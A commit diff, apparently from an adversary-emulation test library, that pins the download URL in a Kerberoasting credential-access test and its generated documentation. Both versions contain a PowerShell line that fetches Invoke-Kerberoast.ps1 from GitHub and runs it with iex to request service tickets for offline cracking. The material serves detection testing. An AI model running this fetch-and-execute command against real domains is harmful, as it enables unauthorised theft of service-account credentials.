Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
This commit is contained in:
parent
e695715b47
commit
2d3f3c6ba4
@@ -2495,7 +2495,7 @@ credential-access:
|
||||
atomic_tests:
|
||||
- name: Request for service tickets
|
||||
auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a
|
||||
description: "This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1\nThe
|
||||
description: "This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1\nThe
|
||||
following are further sources and credits for this attack:\n[Kerberoasting
|
||||
Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)\n[Invoke-Kerberoast
|
||||
source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)\nwhen
|
||||
@@ -2519,7 +2519,7 @@ credential-access:
|
||||
executor:
|
||||
command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
|
||||
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
|
||||
Invoke-Kerberoast | fl
|
||||
name: powershell
|
||||
- name: Rubeus kerberoast
|
||||
|
||||
@@ -20,7 +20,7 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Request for service tickets
|
||||
This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
|
||||
This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1
|
||||
The following are further sources and credits for this attack:
|
||||
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
|
||||
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
|
||||
@@ -42,7 +42,7 @@ If the testing domain doesn't have any service principal name configured, there
|
||||
|
||||
```powershell
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
|
||||
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
|
||||
Invoke-Kerberoast | fl
|
||||
```
|
||||
|
||||
|
||||
Reference in New Issue
Block a user